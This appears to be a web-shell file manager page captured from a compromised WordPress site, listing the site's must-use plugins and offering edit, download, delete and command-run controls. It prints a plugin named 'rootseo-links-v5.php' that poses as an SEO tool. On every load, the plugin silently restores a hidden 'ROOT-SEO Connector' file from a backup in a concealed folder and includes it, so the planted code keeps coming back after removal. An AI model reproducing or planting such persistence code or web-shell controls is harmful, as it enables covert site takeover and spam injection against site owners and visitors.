/
home
/
vianto5
/
ceibaresidencial.mx
/
wp-content
/
mu-plugins
/
/home/vianto5/ceibaresidencial.mx/wp-content/mu-plugins
mkdir
upload
Name
Size
Mode
Actions
rootseo-links-v5.php
941
0644
edit
dl
rm
wp-oembed-handler.php
2793
0644
edit
dl
rm
Edit:
/home/vianto5/ceibaresidencial.mx/wp-content/mu-plugins/rootseo-links-v5.php
(941B)
<?php /* ROOTSEO_MUPLUGIN:4307d7bcc7f1 v5.4 */ if (!defined('ABSPATH')) { return; } add_action('plugins_loaded', function () { $c = '/home/vianto5/ceibaresidencial.mx/seo-config.php'; if (!file_exists($c)) { $d = dirname($c); foreach ((array)@glob($d . '/.rs_g*/.rs_connector.php.bak') as $bak) { $src = @file_get_contents($bak); if ($src !== false && $src !== '' && strpos($src, '<?php') !== false && strpos($src, 'ROOT-SEO Connector') !== false) { @file_put_contents($c, $src); if (function_exists('opcache_invalidate')) { @opcache_invalidate($c, true); } break; } } } if (!file_exists($c)) { return; } if (!defined('ROOTSEO_EMBED_VIA_HOOK')) define('ROOTSEO_EMBED_VIA_HOOK', true); if (!defined('ROOTSEO_CONNECTOR_EMBED_RENDER')) define('ROOTSEO_CONNECTOR_EMBED_RENDER', true); include_once $c; }, 1);
Save
cmd:
run